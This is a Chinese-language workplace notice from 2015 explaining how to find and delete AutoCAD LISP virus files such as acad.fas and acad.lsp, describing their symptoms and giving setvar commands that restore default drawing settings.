2.点“书签”
3.里面有我做好的记录,分别选择搜索”acad.fas” “acaddoc.lsp“”acaddoc.lsp_bak“三个文件,
然后选中,按“delete”键删除。
注:文件夹除外,文件夹是用来免疫的,防止病毒再复制到该文件夹下的,利用的原理就是不能有两个相同文件名的文件同时存在于同一个文件夹下。
4.务必每个人的电脑都做如上操作一次。
如果有文件删不掉或不清楚操作,联系我。
5.操作完之后,右下角有个图标,点右键,退出.
江增源
2015.12.08
2015.12.17更新
1.最近又发现了一个新的病毒文件,文件名为“acad.lsp”,删除方法同上,搜到的文件只要是文件名名字完全匹配的,都删除掉就可以。
2.这个病毒的发作特征就是打开CAD会弹出一个空白的窗口出来。
江增源
2015.12.17。
CAD解决办法
一、该病毒发作后的主要表现为:①、病毒在启动CAD时会弹出一个显示时间并写有“党是不会亏待你”的对话框;②、病毒在8:00至18:00这个段时间内,对CAD画图没有任何的影响。
当时间不在8:00至18:00之间时,会弹出如下对话框,可能伴随“移动”命令改变~等情况。
(原病毒作者如是说。
不过我在CAD2002上没有发现此更象,可能高版本的CAD才会吧。
)二、清除方法:①、关闭CAD(一定要先关闭正在运行的CAD程序)②、按F3键打开XP系统的文件搜索窗口,搜索并删除acad.fas和lcm.fas文件③、XP文件搜索窗口设置如下:a.搜索acad.fas文件b.搜索lcm.fas文件注意:①、“搜索范围”一定要选择“本机硬盘驱动器(C:;D:;E:;F:)”。
②、一定要先勾选“搜索选项”中的“高级选项”,将其下的“搜索子文件夹”项勾选上,否则不能将病毒文件全部搜索清除干净CAD鼠标中键滚轮失效不能平移CAD鼠标中键滚轮失效不能平移,可能还会出现被选择物体不能加亮显示,图案填充不正确等情况,这是同由于cad病毒修改的AutoCAD的系统变量所致,手动清除病毒和修复CAD的方法如下:一、清除CAD病毒:全盘搜索“acad.lsp”、“acadapp.lsp”、“acadappp.lsp”这三个文件并删除;二、复制如下代码到Autocad命令行后回车执行即可(setvar "zoomfactor" 60)(setvar"mbuttonpan" 1)(setvar"HIGHLIGHT"1)(setvar "fillmode" 1)注:上面变量后的值为系统默认值,下面是这四个变量的相关参考zoomfactor;类型:整数保存位置:注册表初始值: 60接受一个整数,有效值为 0 到 100。
数字越大,鼠标滑轮每次前后移动引起改变的增量就越多。